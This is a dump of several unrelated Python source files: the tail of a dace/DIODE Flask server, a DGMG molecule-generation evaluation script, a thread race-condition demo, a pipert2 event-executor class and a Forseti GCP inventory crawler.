@app.route('/dace/api/v1.0/status', methods=['POST'])
def status():
# just a kind of ping/pong to see if the server is running
return "OK"
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-l",
"--localhost",
action="store_true",
help="Bind to localhost only")
parser.add_argument("-r",
"--remotedace",
action="store_true",
help="Use ssh commands instead of locally running dace")
parser.add_argument("-rd",
"--restoredace",
action="store_true",
help="Restore the backup file")
parser.add_argument(
"-e",
"--executor",
action="store_true",
help="Run as an executor server instead of DIODE server")
parser.add_argument("-p", "--port", type=int, help="Port to listen on")
args = parser.parse_args()
if args.restoredace:
from dace.config import Config
Config.load("./dace.conf.bak")
Config.save()
remote_execution = args.remotedace
es = ExecutorServer()
es_ref.append(es)
if not args.executor:
app.run(host='localhost' if args.localhost else "0.0.0.0",
debug=True,
port=args.port,
use_reloader=False)
es.stop()
else:
import atexit
def tmp():
es.stop()
atexit.register(tmp)
# Wait for an event that will never arrive (passive wait)
event = threading.Event()
event.wait()
if __name__ == '__main__':
main()
|
eval.py
|
import os
import pickle
import shutil
import torch
from dgl import model_zoo
from utils import MoleculeDataset, set_random_seed, download_data,\
mkdir_p, summarize_molecules, get_unique_smiles, get_novel_smiles
def generate_and_save(log_dir, num_samples, max_num_steps, model):
with open(os.path.join(log_dir, 'generated_smiles.txt'), 'w') as f:
for i in range(num_samples):
with torch.no_grad():
s = model(rdkit_mol=True, max_num_steps=max_num_steps)
f.write(s + '\n')
def prepare_for_evaluation(rank, args):
worker_seed = args['seed'] + rank * 10000
set_random_seed(worker_seed)
torch.set_num_threads(1)
# Setup dataset and data loader
dataset = MoleculeDataset(args['dataset'], subset_id=rank, n_subsets=args['num_processes'])
# Initialize model
if not args['pretrained']:
model = model_zoo.chem.DGMG(atom_types=dataset.atom_types,
bond_types=dataset.bond_types,
node_hidden_size=args['node_hidden_size'],
num_prop_rounds=args['num_propagation_rounds'], dropout=args['dropout'])
model.load_state_dict(torch.load(args['model_path'])['model_state_dict'])
else:
model = model_zoo.chem.load_pretrained('_'.join(['DGMG', args['dataset'], args['order']]), log=False)
model.eval()
worker_num_samples = args['num_samples'] // args['num_processes']
if rank == args['num_processes'] - 1:
worker_num_samples += args['num_samples'] % args['num_processes']
worker_log_dir = os.path.join(args['log_dir'], str(rank))
mkdir_p(worker_log_dir, log=False)
generate_and_save(worker_log_dir, worker_num_samples, args['max_num_steps'], model)
def remove_worker_tmp_dir(args):
for rank in range(args['num_processes']):
worker_path = os.path.join(args['log_dir'], str(rank))
try:
shutil.rmtree(worker_path)
except OSError:
print('Directory {} does not exist!'.format(worker_path))
def aggregate_and_evaluate(args):
print('Merging generated SMILES into a single file...')
smiles = []
for rank in range(args['num_processes']):
with open(os.path.join(args['log_dir'], str(rank), 'generated_smiles.txt'), 'r') as f:
rank_smiles = f.read().splitlines()
smiles.extend(rank_smiles)
with open(os.path.join(args['log_dir'], 'generated_smiles.txt'), 'w') as f:
for s in smiles:
f.write(s + '\n')
print('Removing temporary dirs...')
remove_worker_tmp_dir(args)
# Summarize training molecules
print('Summarizing training molecules...')
train_file = '_'.join([args['dataset'], 'DGMG_train.txt'])
if not os.path.exists(train_file):
download_data(args['dataset'], train_file)
with open(train_file, 'r') as f:
train_smiles = f.read().splitlines()
train_summary = summarize_molecules(train_smiles, args['num_processes'])
with open(os.path.join(args['log_dir'], 'train_summary.pickle'), 'wb') as f:
pickle.dump(train_summary, f)
# Summarize generated molecules
print('Summarizing generated molecules...')
generation_summary = summarize_molecules(smiles, args['num_processes'])
with open(os.path.join(args['log_dir'], 'generation_summary.pickle'), 'wb') as f:
pickle.dump(generation_summary, f)
# Stats computation
print('Preparing generation statistics...')
valid_generated_smiles = generation_summary['smile']
unique_generated_smiles = get_unique_smiles(valid_generated_smiles)
unique_train_smiles = get_unique_smiles(train_summary['smile'])
novel_generated_smiles = get_novel_smiles(unique_generated_smiles, unique_train_smiles)
with open(os.path.join(args['log_dir'], 'generation_stats.txt'), 'w') as f:
f.write('Total number of generated molecules: {:d}\n'.format(len(smiles)))
f.write('Validity among all: {:.4f}\n'.format(
len(valid_generated_smiles) / len(smiles)))
f.write('Uniqueness among valid ones: {:.4f}\n'.format(
len(unique_generated_smiles) / len(valid_generated_smiles)))
f.write('Novelty among unique ones: {:.4f}\n'.format(
len(novel_generated_smiles) / len(unique_generated_smiles)))
if __name__ == '__main__':
import argparse
import datetime
import time
from rdkit import rdBase
from utils import setup
parser = argparse.ArgumentParser(description='Evaluating DGMG for molecule generation',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# configure
parser.add_argument('-s', '--seed', type=int, default=0, help='random seed')
# dataset and setting
parser.add_argument('-d', '--dataset',
help='dataset to use')
parser.add_argument('-o', '--order', choices=['random', 'canonical'],
help='order to generate graphs, used for naming evaluation directory')
# log
parser.add_argument('-l', '--log-dir', default='./eval_results',
help='folder to save evaluation results')
parser.add_argument('-p', '--model-path', type=str, default=None,
help='path to saved model')
parser.add_argument('-pr', '--pretrained', action='store_true',
help='Whether to use a pre-trained model')
parser.add_argument('-ns', '--num-samples', type=int, default=100000,
help='Number of molecules to generate')
parser.add_argument('-mn', '--max-num-steps', type=int, default=400,
help='Max number of steps allowed in generated molecules to ensure termination')
# multi-process
parser.add_argument('-np', '--num-processes', type=int, default=32,
help='number of processes to use')
parser.add_argument('-gt', '--generation-time', type=int, default=600,
help='max time (seconds) allowed for generation with multiprocess')
args = parser.parse_args()
args = setup(args, train=False)
rdBase.DisableLog('rdApp.error')
t1 = time.time()
if args['num_processes'] == 1:
prepare_for_evaluation(0, args)
else:
import multiprocessing as mp
procs = []
for rank in range(args['num_processes']):
p = mp.Process(target=prepare_for_evaluation, args=(rank, args,))
procs.append(p)
p.start()
while time.time() - t1 <= args['generation_time']:
if any(p.is_alive() for p in procs):
time.sleep(5)
else:
break
else:
print('Timeout, killing all processes.')
for p in procs:
p.terminate()
p.join()
t2 = time.time()
print('It took {} for generation.'.format(
datetime.timedelta(seconds=t2 - t1)))
aggregate_and_evaluate(args)
|
thread.py
|
import threading
# global variable x
x = 0
def increment():
"""
function to increment global variable x
"""
global x
x += 1
def thread_task():
"""
task for thread
calls increment function 100000 times.
"""
for _ in range(100000):
increment()
def main_task():
global x
# setting global variable x as 0
x = 0
# creating threads
t1 = threading.Thread(target=thread_task)
t2 = threading.Thread(target=thread_task)
# start threads
t1.start()
t2.start()
# wait until threads finish their job
t1.join()
t2.join()
if __name__ == "__main__":
for i in range(100):
main_task()
print("Iteration {0}: x = {1}".format(i,x))
|
base_event_executor.py
|
from logging import Logger
from multiprocessing import Process
from pipert2.utils.method_data import Method
from pipert2.utils.dummy_object import Dummy
from pipert2.utils.interfaces import EventExecutorInterface
from pipert2.utils.annotations import class_functions_dictionary
from pipert2.utils.consts import KILL_EVENT_NAME, STOP_EVENT_NAME
from pipert2.core.managers.event_board import EventBoard, EventHandler
class BaseEventExecutor(EventExecutorInterface):
"""BaseEventExecutor is an base implementation for event loop listener.
"""
events = class_functions_dictionary()
def __init__(self, event_board: EventBoard, logger: Logger):
"""
Args:
event_board (EventBoard): The EventBoard of the pipe.
logger (Logger): Logger object for logging the flow actions.
"""
self._logger = logger
self.event_loop_process: Process = Dummy()
self.events_to_listen = set(self.get_events().keys())
self.event_board = event_board
self.event_handler: EventHandler = Dummy()
def build(self) -> None:
"""Start the event loop process.
"""
self._before_build()
self.event_handler = self.event_board.get_event_handler(self.events_to_listen)
self.event_loop_process = Process(target=self.run)
self.event_loop_process.start()
def run(self) -> None:
"""The event loop process, executing the pipe events that occur.
"""
event: Method = self.event_handler.wait()
while event.event_name != KILL_EVENT_NAME:
self.execute_event(event)
event = self.event_handler.wait()
self.execute_event(Method(STOP_EVENT_NAME))
def execute_event(self, event: Method) -> None:
"""Execute the event callbacks.
Args:
event: The event to be executed.
"""
EventExecutorInterface.execute_event(self, event)
def join(self) -> None:
"""Block until the event loop process terminates
"""
if self.event_loop_process.is_alive():
self.event_loop_process.join()
self._after_join()
@classmethod
def get_events(cls):
"""Get the events of the implement.
Returns:
dict[str, set[Callback]]: The events callbacks mapped by their events.
"""
return cls.events.all[cls.__name__]
def _before_build(self) -> None:
"""The implementation can implement this method and called in build.
"""
pass
def _after_join(self):
"""The implementation can implement this method and called in build.
"""
pass
|
crawler.py
|
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Crawler implementation."""
from Queue import Empty
from Queue import Queue
import threading
import time
from google.cloud.forseti.common.util import logger
from google.cloud.forseti.services.inventory.base import cai_gcp_client
from google.cloud.forseti.services.inventory.base import cloudasset
from google.cloud.forseti.services.inventory.base import crawler
from google.cloud.forseti.services.inventory.base import gcp
from google.cloud.forseti.services.inventory.base import resources
LOGGER = logger.get_logger(__name__)
class CrawlerConfig(crawler.CrawlerConfig):
"""Crawler configuration to inject dependencies."""
def __init__(self, storage, progresser, api_client, variables=None):
"""Initialize
Args:
storage (Storage): The inventory storage
progresser (QueueProgresser): The progresser implemented using
a queue
api_client (ApiClientImpl): GCP API client
variables (dict): config variables
"""
super(CrawlerConfig, self).__init__()
self.storage = storage
self.progresser = progresser
self.variables = {} if not variables else variables
self.client = api_client
class ParallelCrawlerConfig(crawler.CrawlerConfig):
"""Multithreaded crawler configuration, to inject dependencies."""
def __init__(self, storage, progresser, api_client, threads=10,
variables=None):
"""Initialize
Args:
storage (Storage): The inventory storage
progresser (QueueProgresser): The progresser implemented using
a queue
api_client (ApiClientImpl): GCP API client
threads (int): how many threads to use
variables (dict): config variables
"""
super(ParallelCrawlerConfig, self).__init__()
self.storage = storage
self.progresser = progresser
self.variables = {} if not variables else variables
self.threads = threads
self.client = api_client
class Crawler(crawler.Crawler):
"""Simple single-threaded Crawler implementation."""
def __init__(self, config):
"""Initialize
Args:
config (CrawlerConfig): The crawler configuration
"""
super(Crawler, self).__init__()
self.config = config
def run(self, resource):
"""Run the crawler, given a start resource.
Args:
resource (object): Resource to start with.
Returns:
QueueProgresser: The filled progresser described in inventory
"""
resource.accept(self)
return self.config.progresser
def visit(self, resource):
"""Handle a newly found resource.
Args:
resource (object): Resource to handle.
Raises:
Exception: Reraises any exception.
"""
progresser = self.config.progresser
try:
resource.get_iam_policy(self.get_client())
resource.get_gcs_policy(self.get_client())
resource.get_dataset_policy(self.get_client())
resource.get_cloudsql_policy(self.get_client())
resource.get_billing_info(self.get_client())
resource.get_enabled_apis(self.get_client())
resource.get_kubernetes_service_config(self.get_client())
self.write(resource)
except Exception as e:
LOGGER.exception(e)
progresser.on_error(e)
raise
else:
progresser.on_new_object(resource)
def dispatch(self, callback):
"""Dispatch crawling of a subtree.
Args:
callback (function): Callback to dispatch.
"""
callback()
def write(self, resource):
"""Save resource to storage.
Args:
resource (object): Resource to handle.
"""
self.config.storage.write(resource)
def get_client(self):
"""Get the GCP API client.
Returns:
object: GCP API client
"""
return self.config.client
def on_child_error(self, error):
"""Process the error generated by child of a resource
Inventory does not stop for children errors but raise a warning
Args:
error (str): error message to handle
"""
warning_message = '{}\n'.format(error)
self.config.storage.warning(warning_message)
self.config.progresser.on_warning(error)
def update(self, resource):
"""Update the row of an existing resource
Args:
resource (Resource): Resource to update.
Raises:
Exception: Reraises any exception.
"""
try:
self.config.storage.update(resource)
except Exception as e:
LOGGER.exception(e)
self.config.progresser.on_error(e)
raise
class ParallelCrawler(Crawler):
"""Multi-threaded Crawler implementation."""
def __init__(self, config):
"""Initialize
Args:
config (ParallelCrawlerConfig): The crawler configuration
"""
super(ParallelCrawler, self).__init__(config)
self._write_lock = threading.Lock()
self._dispatch_queue = Queue()
self._shutdown_event = threading.Event()
def _start_workers(self):
"""Start a pool of worker threads for processing the dispatch queue."""
self._shutdown_event.clear()
for _ in xrange(self.config.threads):
worker = threading.Thread(target=self._process_queue)
worker.daemon = True
worker.start()
def _process_queue(self):
"""Process items in the queue until the shutdown event is set."""
while not self._shutdown_event.is_set():
try:
callback = self._dispatch_queue.get(timeout=1)
except Empty:
continue
callback()
self._dispatch_queue.task_done()
def run(self, resource):
"""Run the crawler, given a start resource.
Args:
resource (Resource): Resource to start with.
Returns:
QueueProgresser: The filled progresser described in inventory
"""
try:
self._start_workers()
resource.accept(self)
self._dispatch_queue.join()
finally:
self._shutdown_event.set()
# Wait for threads to exit.
time.sleep(2)
return self.config.progresser
def dispatch(self, callback):
"""Dispatch crawling of a subtree.
Args:
callback (function): Callback to dispatch.
"""
self._dispatch_queue.put(callback)
def write(self, resource):
"""Save resource to storage.
Args:
resource (Resource): Resource to handle.
"""
with self._write_lock:
self.config.storage.write(resource)
def on_child_error(self, error):
"""Process the error generated by child of a resource
Inventory does not stop for children errors but raise a warning
Args:
error (str): error message to handle
"""
warning_message = '{}\n'.format(error)
with self._write_lock:
self.config.storage.warning(warning_message)
self.config.progresser.on_warning(error)
def update(self, resource):
"""Update the row of an existing resource
Args:
resource (Resource): The db row of Resource to update
Raises:
Exception: Reraises any exception.
"""
try:
with self._write_lock:
self.config.storage.update(resource)
except Exception as e:
LOGGER.exception(e)
self.config.progresser.on_error(e)
raise
def _api_client_factory(storage, config, parallel):
"""Creates the proper initialized API client based on the configuration.
Args:
storage (object): Storage implementation to use.
config (object): Inventory configuration on server.
parallel (bool): If true, use the parallel crawler implementation.
Returns:
Union[gcp.ApiClientImpl, cai_gcp_client.CaiApiClientImpl]:
The initialized api client implementation class.
"""
client_config = config.get_api_quota_configs()
client_config['domain_super_admin_email'] = config.get_gsuite_admin_email()
asset_count = 0
if config.get_cai_enabled():
asset_count = cloudasset.load_cloudasset_data(storage.session, config)
LOGGER.info('%s total assets loaded from Cloud Asset data.',
asset_count)
if asset_count:
engine = config.get_service_config().get_engine()
return cai_gcp_client.CaiApiClientImpl(client_config,
engine,
parallel,
storage.session)
# Default to the non-CAI implementation
return gcp.ApiClientImpl(client_config)
def _crawler_factory(storage, progresser, client, parallel):
"""Creates the proper initialized crawler based on the configuration.
Args:
storage (object): Storage implementation to use.
progresser (object): Progresser to notify status updates.
client (object): The API client instance.
parallel (bool): If true, use the parallel crawler implementation.
Returns:
Union[Crawler, ParallelCrawler]:
The initialized crawler implementation class.
"""
if parallel:
parallel_config = ParallelCrawlerConfig(storage, progresser, client)
return ParallelCrawler(parallel_config)
# Default to the non-parallel crawler
crawler_config = CrawlerConfig(storage, progresser, client)
return Crawler(crawler_config)
def _root_resource_factory(config, client):
"""Creates the proper initialized crawler based on the configuration.
Args:
config (object): Inventory configuration on server.
client (object): The API client instance.
Returns:
Resource: The initialized root resource.
"""
if config.use_composite_root():
composite_root_resources = config.get_composite_root_resources()
return resources.CompositeRootResource.create(composite_root_resources)
# Default is a single resource as root.
return resources.from_root_id(client, config.get_root_resource_id())
def run_crawler(storage,
progresser,
config,
parallel=True):
"""Run the crawler with a determined configuration.
Args:
storage (object): Storage implementation to use.
progresser (object): Progresser to notify status updates.
config (object): Inventory configuration on server.
parallel (bool): If true, use the parallel crawler implementation.
Returns:
QueueProgresser: The progresser implemented in inventory
"""
if parallel and 'sqlite' in str(config.get_service_config().get_engine()):
LOGGER.info('SQLite used, disabling parallel threads.')
parallel = False
client = _api_client_factory(storage, config, parallel)
crawler_impl = _crawler_factory(storage, progresser, client, parallel)
resource = _root_resource_factory(config, client)
progresser = crawler_impl.run(resource)
# flush the buffer at the end to make sure nothing is cached.
storage.commit()
return progresser
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.